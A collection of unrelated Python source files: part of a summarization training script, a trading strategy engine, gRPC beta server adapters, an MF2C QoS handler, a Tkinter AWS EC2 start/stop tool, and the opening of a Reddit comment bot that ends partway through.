parser.add_argument("-block_trigram", type=str2bool, nargs='?', const=True, default=True)
args = parser.parse_args()
args.gpu_ranks = [int(i) for i in args.gpu_ranks.split(',')]
os.environ["CUDA_VISIBLE_DEVICES"] = args.visible_gpus
init_logger(args.log_file)
device = "cpu" if args.visible_gpus == '-1' else "cuda"
device_id = 0 if device == "cuda" else -1
if(args.world_size>1):
multi_main(args)
elif (args.mode == 'train'):
train(args, device_id)
elif (args.mode == 'validate'):
wait_and_validate(args, device_id)
elif (args.mode == 'lead'):
baseline(args, cal_lead=True)
elif (args.mode == 'oracle'):
baseline(args, cal_oracle=True)
elif (args.mode == 'test'):
cp = args.test_from
try:
step = int(cp.split('.')[-2].split('_')[-1])
except:
step = 0
test(args, device_id, cp, step)
|
strategy_engine.py
|
# -*- coding: utf-8 -*-
import sys
import platform
import threading
import traceback
from queue import Queue, Empty
from .client_api import *
class Engine(object):
handle = None
if platform.system() == 'Windows':
client_api = ClientAPI('./swordfish_api/client_api.dll')
elif platform.system() == 'Darwin':
client_api = ClientAPI('./swordfish_api/libclient_api.dylib')
else:
raise Exception(f"不支持的操作系统{platform.system()}")
is_quit = False
trd_stream = ""
mkt_stream = ""
req_stream = ""
strategy_name = ""
strategy_path = ""
cl_env_id = 1
strategy_id = 0
strategy_ord_id = 0
msg_queue = Queue()
def init(handle):
Engine.handle = handle
Engine.trd_stream = sys.argv[1]
Engine.mkt_stream = sys.argv[2]
Engine.req_stream = sys.argv[3]
Engine.strategy_name = sys.argv[4]
Engine.strategy_path = sys.argv[8]
Engine.cl_env_id = int(sys.argv[5])
Engine.strategy_id = int(sys.argv[6])
Engine.strategy_ord_id = int(sys.argv[7])
print("strategy_path:", Engine.strategy_path)
Engine.client_api.client_async_api_init(Engine.trd_stream, Engine.mkt_stream, Engine.req_stream,
Engine.strategy_name, Engine.strategy_path, Engine.strategy_id,
Engine.strategy_ord_id, 5000, 1000, CLIENT_API_LOG_LEVEL_DEBUG)
if Engine.client_api.async_ctx is None:
print("ClientAsyncApi Init失败")
return -1
return 0
def on_msg_callback_read_md_stream():
while not Engine.is_quit:
msg = ClientApiStreamMsgT()
if Engine.client_api.client_async_api_wait_md_msg(msg, 1000):
Engine.msg_queue.put(msg)
def on_msg_callback_read_trd_stream():
while not Engine.is_quit:
msg = ClientApiStreamMsgT()
if Engine.client_api.client_async_api_wait_trd_msg(msg, 1000):
Engine.msg_queue.put(msg)
def process_msg():
while not Engine.is_quit:
try:
msg = Engine.msg_queue.get(timeout=1)
# print(f"接收到交易消息 msg_id: {msg.msg_head.msg_id}")
msg_id = msg.msg_head.msg_id
if msg_id == ClientApiMsgTypeT.CLIENT_API_MSG_CLIENT_QUIT.value:
Engine.is_quit = True
print(f"接收到客户端退出消息, 设置退出标志且返回 -1 msg_id: {msg_id}")
elif msg_id == ClientApiMsgTypeT.CLIENT_API_MSG_STRATEGY_EXE_SHUTDOWN.value:
Engine.is_quit = True
Engine.client_api.client_async_api_send_notify_msg(f"{Engine.strategy_name} 被动退出",
CLIENT_API_NOTIFY_LEVEL_IMPORTANT)
print(f"接收到策略被动退出消息, 设置退出标志且返回 -1 msg_id: {msg_id}")
elif msg_id == ClientApiMsgTypeT.CLIENT_API_MSG_STRATEGY_EXE_QUITTED.value:
Engine.is_quit = True
print(f"接收到策略主动退出消息, 设置退出标志且返回 -1 msg_id: {msg_id}")
Engine.handle(msg)
except Empty:
pass
except:
print(traceback.format_exc())
return
def do():
wait_trd_msg = threading.Thread(target=on_msg_callback_read_trd_stream)
wait_md_msg = threading.Thread(target=on_msg_callback_read_md_stream)
process_msg_thread = threading.Thread(target=process_msg)
print("初始化CLIENT ASYNC API成功")
wait_trd_msg.start()
wait_md_msg.start()
process_msg_thread.start()
Engine.client_api.client_async_api_add_strategy()
rc = Engine.client_api.client_async_api_run()
if rc < 0:
print("ClientAsyncApi run 失败")
return -1
print("CLIENT ASYNC API STOP 成功")
Engine.client_api.client_async_api_destory()
print("销毁CLIENT ASYNC API成功")
wait_trd_msg.join()
wait_md_msg.join()
process_msg_thread.join()
return 0
def engine_quit():
Engine.is_quit = True
rc = Engine.client_api.client_async_api_send_quited_msg()
return rc
def send_order(security_id, mkt_id, bs_type, ord_type, ord_qty, ord_price):
Engine.strategy_ord_id += 1
Engine.client_api.client_async_api_send_order_req(security_id, mkt_id, bs_type, ord_type,
Engine.strategy_ord_id, ord_qty,
ord_price, 1)
return Engine.strategy_ord_id
def send_notify_msg(msg, msg_level):
return Engine.client_api.client_async_api_send_notify_msg(msg, msg_level)
def is_owned_by_myself(user_info):
return Engine.client_api.client_is_owned_by_strategy(user_info, Engine.strategy_id)
|
_server_adaptations.py
|
# Copyright 2016, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Translates gRPC's server-side API into gRPC's server-side Beta API."""
import collections
import threading
import grpc
from grpc import _common
from grpc.beta import interfaces
from grpc.framework.common import cardinality
from grpc.framework.common import style
from grpc.framework.foundation import abandonment
from grpc.framework.foundation import logging_pool
from grpc.framework.foundation import stream
from grpc.framework.interfaces.face import face
# pylint: disable=too-many-return-statements
_DEFAULT_POOL_SIZE = 8
class _ServerProtocolContext(interfaces.GRPCServicerContext):
def __init__(self, servicer_context):
self._servicer_context = servicer_context
def peer(self):
return self._servicer_context.peer()
def disable_next_response_compression(self):
pass # TODO(https://github.com/grpc/grpc/issues/4078): design, implement.
class _FaceServicerContext(face.ServicerContext):
def __init__(self, servicer_context):
self._servicer_context = servicer_context
def is_active(self):
return self._servicer_context.is_active()
def time_remaining(self):
return self._servicer_context.time_remaining()
def add_abortion_callback(self, abortion_callback):
raise NotImplementedError(
'add_abortion_callback no longer supported server-side!')
def cancel(self):
self._servicer_context.cancel()
def protocol_context(self):
return _ServerProtocolContext(self._servicer_context)
def invocation_metadata(self):
return _common.to_cygrpc_metadata(
self._servicer_context.invocation_metadata())
def initial_metadata(self, initial_metadata):
self._servicer_context.send_initial_metadata(initial_metadata)
def terminal_metadata(self, terminal_metadata):
self._servicer_context.set_terminal_metadata(terminal_metadata)
def code(self, code):
self._servicer_context.set_code(code)
def details(self, details):
self._servicer_context.set_details(details)
def _adapt_unary_request_inline(unary_request_inline):
def adaptation(request, servicer_context):
return unary_request_inline(request,
_FaceServicerContext(servicer_context))
return adaptation
def _adapt_stream_request_inline(stream_request_inline):
def adaptation(request_iterator, servicer_context):
return stream_request_inline(request_iterator,
_FaceServicerContext(servicer_context))
return adaptation
class _Callback(stream.Consumer):
def __init__(self):
self._condition = threading.Condition()
self._values = []
self._terminated = False
self._cancelled = False
def consume(self, value):
with self._condition:
self._values.append(value)
self._condition.notify_all()
def terminate(self):
with self._condition:
self._terminated = True
self._condition.notify_all()
def consume_and_terminate(self, value):
with self._condition:
self._values.append(value)
self._terminated = True
self._condition.notify_all()
def cancel(self):
with self._condition:
self._cancelled = True
self._condition.notify_all()
def draw_one_value(self):
with self._condition:
while True:
if self._cancelled:
raise abandonment.Abandoned()
elif self._values:
return self._values.pop(0)
elif self._terminated:
return None
else:
self._condition.wait()
def draw_all_values(self):
with self._condition:
while True:
if self._cancelled:
raise abandonment.Abandoned()
elif self._terminated:
all_values = tuple(self._values)
self._values = None
return all_values
else:
self._condition.wait()
def _run_request_pipe_thread(request_iterator, request_consumer,
servicer_context):
thread_joined = threading.Event()
def pipe_requests():
for request in request_iterator:
if not servicer_context.is_active() or thread_joined.is_set():
return
request_consumer.consume(request)
if not servicer_context.is_active() or thread_joined.is_set():
return
request_consumer.terminate()
def stop_request_pipe(timeout): # pylint: disable=unused-argument
thread_joined.set()
request_pipe_thread = _common.CleanupThread(
stop_request_pipe, target=pipe_requests)
request_pipe_thread.start()
def _adapt_unary_unary_event(unary_unary_event):
def adaptation(request, servicer_context):
callback = _Callback()
if not servicer_context.add_callback(callback.cancel):
raise abandonment.Abandoned()
unary_unary_event(request, callback.consume_and_terminate,
_FaceServicerContext(servicer_context))
return callback.draw_all_values()[0]
return adaptation
def _adapt_unary_stream_event(unary_stream_event):
def adaptation(request, servicer_context):
callback = _Callback()
if not servicer_context.add_callback(callback.cancel):
raise abandonment.Abandoned()
unary_stream_event(request, callback,
_FaceServicerContext(servicer_context))
while True:
response = callback.draw_one_value()
if response is None:
return
else:
yield response
return adaptation
def _adapt_stream_unary_event(stream_unary_event):
def adaptation(request_iterator, servicer_context):
callback = _Callback()
if not servicer_context.add_callback(callback.cancel):
raise abandonment.Abandoned()
request_consumer = stream_unary_event(
callback.consume_and_terminate,
_FaceServicerContext(servicer_context))
_run_request_pipe_thread(request_iterator, request_consumer,
servicer_context)
return callback.draw_all_values()[0]
return adaptation
def _adapt_stream_stream_event(stream_stream_event):
def adaptation(request_iterator, servicer_context):
callback = _Callback()
if not servicer_context.add_callback(callback.cancel):
raise abandonment.Abandoned()
request_consumer = stream_stream_event(
callback, _FaceServicerContext(servicer_context))
_run_request_pipe_thread(request_iterator, request_consumer,
servicer_context)
while True:
response = callback.draw_one_value()
if response is None:
return
else:
yield response
return adaptation
class _SimpleMethodHandler(
collections.namedtuple('_MethodHandler', (
'request_streaming', 'response_streaming', 'request_deserializer',
'response_serializer', 'unary_unary', 'unary_stream',
'stream_unary', 'stream_stream',)), grpc.RpcMethodHandler):
pass
def _simple_method_handler(implementation, request_deserializer,
response_serializer):
if implementation.style is style.Service.INLINE:
if implementation.cardinality is cardinality.Cardinality.UNARY_UNARY:
return _SimpleMethodHandler(
False, False, request_deserializer, response_serializer,
_adapt_unary_request_inline(implementation.unary_unary_inline),
None, None, None)
elif implementation.cardinality is cardinality.Cardinality.UNARY_STREAM:
return _SimpleMethodHandler(
False, True, request_deserializer, response_serializer, None,
_adapt_unary_request_inline(implementation.unary_stream_inline),
None, None)
elif implementation.cardinality is cardinality.Cardinality.STREAM_UNARY:
return _SimpleMethodHandler(True, False, request_deserializer,
response_serializer, None, None,
_adapt_stream_request_inline(
implementation.stream_unary_inline),
None)
elif implementation.cardinality is cardinality.Cardinality.STREAM_STREAM:
return _SimpleMethodHandler(
True, True, request_deserializer, response_serializer, None,
None, None,
_adapt_stream_request_inline(
implementation.stream_stream_inline))
elif implementation.style is style.Service.EVENT:
if implementation.cardinality is cardinality.Cardinality.UNARY_UNARY:
return _SimpleMethodHandler(
False, False, request_deserializer, response_serializer,
_adapt_unary_unary_event(implementation.unary_unary_event),
None, None, None)
elif implementation.cardinality is cardinality.Cardinality.UNARY_STREAM:
return _SimpleMethodHandler(
False, True, request_deserializer, response_serializer, None,
_adapt_unary_stream_event(implementation.unary_stream_event),
None, None)
elif implementation.cardinality is cardinality.Cardinality.STREAM_UNARY:
return _SimpleMethodHandler(
True, False, request_deserializer, response_serializer, None,
None,
_adapt_stream_unary_event(implementation.stream_unary_event),
None)
elif implementation.cardinality is cardinality.Cardinality.STREAM_STREAM:
return _SimpleMethodHandler(
True, True, request_deserializer, response_serializer, None,
None, None,
_adapt_stream_stream_event(implementation.stream_stream_event))
def _flatten_method_pair_map(method_pair_map):
method_pair_map = method_pair_map or {}
flat_map = {}
for method_pair in method_pair_map:
method = _common.fully_qualified_method(method_pair[0], method_pair[1])
flat_map[method] = method_pair_map[method_pair]
return flat_map
class _GenericRpcHandler(grpc.GenericRpcHandler):
def __init__(self, method_implementations, multi_method_implementation,
request_deserializers, response_serializers):
self._method_implementations = _flatten_method_pair_map(
method_implementations)
self._request_deserializers = _flatten_method_pair_map(
request_deserializers)
self._response_serializers = _flatten_method_pair_map(
response_serializers)
self._multi_method_implementation = multi_method_implementation
def service(self, handler_call_details):
method_implementation = self._method_implementations.get(
handler_call_details.method)
if method_implementation is not None:
return _simple_method_handler(
method_implementation,
self._request_deserializers.get(handler_call_details.method),
self._response_serializers.get(handler_call_details.method))
elif self._multi_method_implementation is None:
return None
else:
try:
return None #TODO(nathaniel): call the multimethod.
except face.NoSuchMethodError:
return None
class _Server(interfaces.Server):
def __init__(self, grpc_server):
self._grpc_server = grpc_server
def add_insecure_port(self, address):
return self._grpc_server.add_insecure_port(address)
def add_secure_port(self, address, server_credentials):
return self._grpc_server.add_secure_port(address, server_credentials)
def start(self):
self._grpc_server.start()
def stop(self, grace):
return self._grpc_server.stop(grace)
def __enter__(self):
self._grpc_server.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self._grpc_server.stop(None)
return False
def server(service_implementations, multi_method_implementation,
request_deserializers, response_serializers, thread_pool,
thread_pool_size):
generic_rpc_handler = _GenericRpcHandler(
service_implementations, multi_method_implementation,
request_deserializers, response_serializers)
if thread_pool is None:
effective_thread_pool = logging_pool.pool(_DEFAULT_POOL_SIZE
if thread_pool_size is None
else thread_pool_size)
else:
effective_thread_pool = thread_pool
return _Server(
grpc.server(effective_thread_pool, handlers=(generic_rpc_handler,)))
|
handler_qos.py
|
"""
SLAs' notifications handler
This is being developed for the MF2C Project: http://www.mf2c-project.eu/
Copyright: Roi Sucasas Font, Atos Research and Innovation, 2017.
This code is licensed under an Apache 2.0 license. Please, refer to the LICENSE.TXT file for more information
Created on 27 sept. 2017
@author: Roi Sucasas - ATOS
"""
import threading, time
from lifecycle.logs import LOG
from lifecycle import common as common
from lifecycle.modules import agent_decision as agent_decision
from lifecycle.data import data_adapter as data_adapter
from lifecycle.modules.apps.compss import adapter as compss_adpt
from lifecycle.connectors import connector as connector
from lifecycle.common import STATUS_CREATED_NOT_INITIALIZED
###############################################################################
# QoS Notifications: handles qos enforcement notifications
# {
# "type": "qos_enforcement",
# "data"
# {
# "user_id": "",
# "device_id": "",
# "service_instance_id": "",
# "message": "",
# "num_agents": ""
# }
# }
# List of service instances being processed
QoS_SERVICE_INSTANCES_LIST = []
# __deploy_COMPSs_in_agent
def __deploy_COMPSs_in_agent(service, service_instance, agent_ip):
LOG.debug("[lifecycle.events.handler_qos] [__deploy_COMPSs_in_agent] Deploying COMPSs service instance [" + service_instance['id'] + "] in new agent [" + agent_ip + "] ...")
try:
# 1. create NEW AGENT
LOG.debug("[lifecycle.events.handler_qos] [__deploy_COMPSs_in_agent] Creating new service instance agent [" + agent_ip + "]")
new_agent = {"device_id": "-",
"app_type": service['exec_type'],
"ports": service['exec_ports'],
"url": agent_ip,
"status": STATUS_CREATED_NOT_INITIALIZED,
"compss_app_id": "-",
"allow": True,
"container_id": "-",
"master_compss": False,
"agent_param": "not-defined"}
# 2. DEPLOY COMPSs in NEW AGENT
LOG.debug("[lifecycle.events.handler_qos] [__deploy_COMPSs_in_agent] allocate service in remote agent [" + new_agent['url'] + "]")
resp_deploy = connector.lifecycle_deploy(service, service_instance, new_agent)
if resp_deploy is not None:
new_agent['status'] = resp_deploy['status']
new_agent['container_id'] = resp_deploy['container_id']
new_agent['ports'] = resp_deploy['ports']
LOG.debug("[lifecycle.events.handler_qos] [__deploy_COMPSs_in_agent] service deployed in remote agent: [agent=" + str(new_agent) + "]")
# executes / starts service
resp_start = connector.lifecycle_operation(service, new_agent, "start")
if resp_start is not None:
new_agent['status'] = resp_start['status']
LOG.debug("[lifecycle.events.handler_qos] [__deploy_COMPSs_in_agent] execute service in remote agent: [agent=" + str(new_agent) + "]")
return True, new_agent
else:
LOG.error("[lifecycle.events.handler_qos] [__deploy_COMPSs_in_agent] allocate service in remote agent: NOT DEPLOYED")
new_agent['status'] = "not-deployed"
except:
LOG.exception("[lifecycle.events.handler_qos] [__deploy_COMPSs_in_agent] Exception. Returning False ...")
return False, None
# thread
# notification = body['data']
def thr(notification):
try:
global QoS_SERVICE_INSTANCES_LIST
LOG.debug("[lifecycle.events.handler_qos] [thr] Handling QoS notifications [" + str(notification) + "] ...")
# get notification values
service_instance_id = notification['service_instance_id']
service_instance = data_adapter.get_service_instance(service_instance_id)
service = data_adapter.get_service(service_instance['service'])
current_num_agents = len(service_instance['agents']) #service['num_agents']
new_num_agents = notification['num_agents']
appId = data_adapter.serv_instance_get_appid_from_master(service_instance)
if not appId:
LOG.error("[lifecycle.events.handler_qos] [thr] Service instance reconfiguration: 'appId' not found in service_instance!")
LOG.error("[lifecycle.events.handler_qos] [thr] service_instance=" + str(service_instance))
else:
# ADD NEW RESOURCES TO COMPSs MASTER
if new_num_agents > current_num_agents:
LOG.debug("[lifecycle.events.handler_qos] [thr] new_num_agents > current_num_agents")
LOG.info("[lifecycle.events.handler_qos] [thr] Reconfiguring service instance: Adding more nodes to service instance (COMPSs) ...")
# Call to landscaper/recommender
LOG.debug("[lifecycle.events.handler_qos] [thr] Getting list of available agents ...")
available_agents_list = agent_decision.get_available_agents_resources(service) # ==> [{"agent_ip": "192.168.252.41"}, ...]
LOG.debug("[lifecycle.events.handler_qos] [thr] List of available agents: " + str(available_agents_list))
if len(available_agents_list) > 0:
LOG.debug("[lifecycle.events.handler_qos] [thr] Reconfiguring service instance: Checking available resources ...")
for agent in available_agents_list:
LOG.debug("[lifecycle.events.handler_qos] [thr] - checking agent [" + str(agent) + "]")
# add new resources to master if agent does not belong to current execution
if not data_adapter.serv_instance_is_agent_in_service_instance(service_instance, agent["agent_ip"]) and new_num_agents > current_num_agents:
# DEPLOY
LOG.debug("[lifecycle.events.handler_qos] [thr] Deploying COMPSs in agent [" + str(agent) + "] ...")
res, new_agent = __deploy_COMPSs_in_agent(service, service_instance, agent["agent_ip"])
if res:
# ADD TO COMPSs
LOG.debug("[lifecycle.events.handler_qos] [thr] Adding to COMPSs execution ...")
time.sleep(25)
if compss_adpt.add_resources_to_job(service_instance, appId, agent["agent_ip"], new_agent['ports']):
service_instance['agents'].append(new_agent)
data_adapter.update_service_instance(service_instance['id'], service_instance)
current_num_agents = current_num_agents + 1
else:
LOG.error("[lifecycle.events.handler_qos] [thr] Reconfiguring service instance: Error adding new resources / 'appId' not found in service_instance!")
else:
LOG.error("[lifecycle.events.handler_qos] [thr] Handling QoS notifications: available_agents_list is None or is empty ")
LOG.debug("[lifecycle.events.handler_qos] [thr] Waiting 60s to terminate process ...")
time.sleep(60)
# REMOVE RESOURCES FROM COMPSs MASTER
elif new_num_agents < current_num_agents:
LOG.debug("[lifecycle.events.handler_qos] [thr] new_num_agents < current_num_agents")
LOG.info("[lifecycle.events.handler_qos] [thr] Reconfiguring service instance: Removing nodes from service instance (COMPSs) ...")
for agent in service_instance['agents']:
# if agent is not the master, it can be removed
if not data_adapter.serv_instance_is_master(agent) and new_num_agents < current_num_agents:
if compss_adpt.rem_resources_from_job(service_instance, appId, agent["agent_ip"]):
current_num_agents = current_num_agents - 1
LOG.debug("[lifecycle.events.handler_qos] [thr] Waiting 60s to terminate process ...")
time.sleep(60)
else:
LOG.debug("[lifecycle.events.handler_qos] [thr] new_num_agents = current_num_agents")
LOG.debug("[lifecycle.events.handler_qos] [thr] Waiting 10s to terminate process ...")
time.sleep(10)
LOG.debug("[lifecycle.events.handler_qos] [thr] Removing service instance id from QoS_SERVICE_INSTANCES_LIST ...")
QoS_SERVICE_INSTANCES_LIST.remove(notification['service_instance_id'])
LOG.debug("[lifecycle.events.handler_qos] [thr] QoS notifications handled")
except:
LOG.exception('[lifecycle.events.handler_qos] [thr] Exception')
QoS_SERVICE_INSTANCES_LIST.remove(notification['service_instance_id'])
# __check_service_instance_id: check if service instance is still being processed
def __check_service_instance_id(service_instance_id):
for sid in QoS_SERVICE_INSTANCES_LIST:
if sid == service_instance_id:
LOG.warning("[lifecycle.events.handler_qos] [__check_notification] service instance [" + service_instance_id + "] is being processed")
return False
LOG.debug("[lifecycle.events.handler_qos] [__check_notification] service instance [" + service_instance_id + "] is NOT being processed")
return True
# Handle QoS violations
def handle_qos_notification(notification):
LOG.info("########################################################################################")
LOG.info("######## QoS ENFORCEMENT")
try:
global QoS_SERVICE_INSTANCES_LIST
LOG.info("[lifecycle.events.handler_qos] [handle_qos_notification] service_instance_id: notification: " + str(notification))
if not 'num_agents' in notification or not 'service_instance_id' in notification:
LOG.error("[lifecycle.events.handler_qos] [handle_qos_notification] 'num_agents' / 'service_instance_id' parameters not found in notification!")
return common.gen_response(406, 'Error', 'parameter num_agents / service_instance_id not found in qos notification', str(notification))
# handle notification
if __check_service_instance_id(notification['service_instance_id']):
LOG.info("[lifecycle.events.handler_qos] [handle_qos_notification] Processing request...")
QoS_SERVICE_INSTANCES_LIST.append(notification['service_instance_id'])
t = threading.Thread(target=thr, args=(notification,))
t.start()
return common.gen_response_ok('QoS Notification is being processed...', 'notification', str(notification))
LOG.info("[lifecycle.events.handler_qos] [handle_qos_notification] Request not processed.")
return common.gen_response_ok("QoS Notification was not processed: List of current service instances being processed: " + str(QoS_SERVICE_INSTANCES_LIST),
"notification",
str(notification))
except:
LOG.exception('[lifecycle.events.handler_qos] [handle_qos_notification] Exception')
return common.gen_response(500, 'Exception', 'notification', str(notification))
|
main.py
|
from threading import Thread, Event
import tkinter as tk
from tkinter import messagebox
import boto3
import time
import configparser
event_configuration_ready = Event()
def server_monitor():
event_configuration_ready.wait()
global ec2;
ec2 = boto3.client('ec2', aws_access_key_id=config['default']['ACCESS_KEY'], aws_secret_access_key=config['default']['SECRET_KEY'], region_name=config['default']['REGION'])
while True:
response = ec2.describe_instances(InstanceIds=[config['default']['INSTANCE_ID']])
server_state = response['Reservations'][0]['Instances'][0]['State']['Name'].lower()
tk_server_status['text'] = server_state.capitalize()
# check current state
if server_state == 'running':
# stop the server
tk_button_on_off.configure(state='active')
tk_button_on_off['text'] = f'Stop server'
tk_server_status.configure(bg='green', fg='azure')
elif server_state == 'stopped':
# start the server
tk_button_on_off.configure(state='active')
tk_button_on_off['text'] = f'Start server'
tk_server_status.configure(bg='red3', fg='azure')
else:
# do nothing because the server is pending
tk_server_status.configure(bg='yellow', fg='black')
tk_button_on_off.configure(state='disabled')
time.sleep(0.5)
def tk_button_on_off_on_click():
server_state = tk_server_status['text'].lower()
# check current state
if server_state == 'running':
# stop the server
ec2.stop_instances(InstanceIds=[config['default']['INSTANCE_ID']])
elif server_state == 'stopped':
# start the server
ec2.start_instances(InstanceIds=[config['default']['INSTANCE_ID']])
else:
# do nothing because the server is pending
return
def tk_about_on_click():
messagebox.showinfo('About', 'Made with love by @debemdeboas on GitHub', master=root)
def tk_configure_on_click():
configuration = tk.Tk()
configuration.geometry('500x100')
configuration.title('Server Configuration')
configuration.wm_resizable(False, False)
configuration.iconbitmap('icon.ico')
tk_label_access_key = tk.Label(configuration, text='Access key:')
tk_entry_access_key = tk.Entry(configuration, width=70)
tk_label_access_key.grid(row=0, column=0)
tk_entry_access_key.grid(row=0, column=1)
tk_entry_access_key.delete(0, tk.END)
tk_entry_access_key.insert(0, config['default']['ACCESS_KEY'])
tk_label_secret_key = tk.Label(configuration, text='Secret key:')
tk_entry_secret_key = tk.Entry(configuration, width=70)
tk_label_secret_key.grid(row=1, column=0)
tk_entry_secret_key.grid(row=1, column=1)
tk_entry_secret_key.delete(0, tk.END)
tk_entry_secret_key.insert(0, config['default']['SECRET_KEY'])
tk_label_region = tk.Label(configuration, text='Region:')
tk_entry_region = tk.Entry(configuration, width=70)
tk_label_region.grid(row=2, column=0)
tk_entry_region.grid(row=2, column=1)
tk_entry_region.delete(0, tk.END)
tk_entry_region.insert(0, config['default']['REGION'])
tk_label_instance_id = tk.Label(configuration, text='Instance ID:')
tk_entry_instance_id = tk.Entry(configuration, width=70)
tk_label_instance_id.grid(row=3, column=0)
tk_entry_instance_id.grid(row=3, column=1)
tk_entry_instance_id.delete(0, tk.END)
tk_entry_instance_id.insert(0, config['default']['INSTANCE_ID'])
def set_and_close():
global config;
config.set('default', 'ACCESS_KEY', tk_entry_access_key.get())
config.set('default', 'SECRET_KEY', tk_entry_secret_key.get())
config.set('default', 'REGION', tk_entry_region.get())
config.set('default', 'INSTANCE_ID', tk_entry_instance_id.get())
# validate configuration
try:
boto3.client('ec2', aws_access_key_id=config['default']['ACCESS_KEY'], aws_secret_access_key=config['default']['SECRET_KEY'], region_name=config['default']['REGION'])
config.write(open('config.ini', 'w'))
ready()
except:
# invalid configuration
tk_server_status['text'] = 'Invalid configuration'
configuration.destroy()
configuration.protocol('WM_DELETE_WINDOW', set_and_close)
configuration.mainloop()
def ready():
event_configuration_ready.set()
root = tk.Tk()
root.geometry('350x180')
root.title('AWS EC2 Manager')
root.wm_resizable(False, False)
root.iconbitmap('icon.ico')
tk_status = tk.Label(text='Server status:', pady=5)
tk_status.pack()
tk_server_status = tk.Label(text='Waiting confiugration', width=20, height=2, font=('Arial', 14))
tk_server_status.pack(pady=10)
tk_button_on_off = tk.Button(text='Waiting...', width=25, height=2, state='disabled', command=tk_button_on_off_on_click)
tk_button_on_off.pack()
tk_menubar = tk.Menu(root)
tk_about_menu = tk.Menu(root, tearoff=0)
tk_about_menu.add_command(label='About', command=tk_about_on_click)
tk_menubar.add_command(label='Configure', command=tk_configure_on_click)
tk_menubar.add_cascade(label='Help', menu=tk_about_menu)
root.config(menu=tk_menubar)
# load configuration
config = configparser.ConfigParser()
config.add_section('default')
config['default'] = {'ACCESS_KEY': '', 'SECRET_KEY': '', 'REGION': '', 'INSTANCE_ID': ''}
config.read('config.ini')
if config['default']['ACCESS_KEY'] != '' and \
config['default']['SECRET_KEY'] != '' and \
config['default']['REGION'] != '' and \
config['default']['INSTANCE_ID'] != '':
ready()
# start
Thread(target=server_monitor, daemon=True).start()
root.mainloop()
|
app.py
|
#!/usr/bin/env python3
# The MIT License (MIT)
# Copyright (c) 2016 RascalTwo @ therealrascaltwo@gmail.com
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import re
import json
import time
import praw
import random
import logging
import logging.handlers
import requests
import threading
class Thread():
def __init__(self, function, name=None, args=None):
self.function = function
thread = threading.Thread(target=self.function, name=name, args=args)
thread.daemon = True
thread.start()
class WeDidItReddit(object):
def __init__(self):
self.processed = self._load_file("data/processed.json")
self.messages = self._load_file("messages.json")
self.config = self._load_file("config.json")
if "comments" not in self.processed:
self.processed["comments"] = []
self.io = {
"data/processed.json": {
"save": False,
"attribute": "processed"
}
}
self.uptime = 0
self.reply_to = []
self.reddit = praw.Reddit(self.config["user_agent"])
self.reddit.login(self.config["username"],
self.config["password"],
disable_warning="True")
def _load_file(self, name):
try:
with open(name, "r") as reading_file:
return json.loads(reading_file.read())
except Exception as exception:
logger.exception(exception)
return {}
def _save_file(self, name, attribute):
with open(name, "w") as writing_file:
writing_file.write(json.dumps(getattr(self, attribute)))
def mark_for_saving(self, name):
if not self.io[name]["save"]:
self.io[name]["save"] = True
def start(self):
self.running = True
rates = {}
for process in self.config["rates"]:
if self.config["rates"][process] in rates:
rates[self.config["rates"][process]].append(process.capitalize())
else:
rates[self.config["rates"][process]] = [process.capitalize()]
log(self.messages["thread_init"],
{"num": 1, "thread_name": "Comments"})
for rate in rates:
rates[rate].sort()
thread_name = "-".join(rates[rate])
log(self.messages["thread_init"],
{"num": list(rates.keys()).index(rate) + 2, "thread_name": thread_name})
Thread(self._loop_runner,
thread_name,
[[getattr(self, "_{}_loop".format(loop.lower())) for loop in rates[rate]], rate])
for comment in praw.helpers.comment_stream(self.reddit, "all+" + "+".join(self.config["subreddits"]), verbosity=0):
if not self.running:
break
if comment.id in self.processed["comments"]:
continue
if self.should_reply_to(comment):
log(self.messages["phrase_found"], {"comment": comment})
self.reply_to.append(comment)
self.add_comment_id(comment.id)
self.mark_for_saving("data/processed.json")
def stop(self):
self.running = False
def _loop_runner(self, loops, rate):
while self.running:
for loop in loops:
loop()
time.sleep(rate)
def _io_loop(self):
for file in self.io:
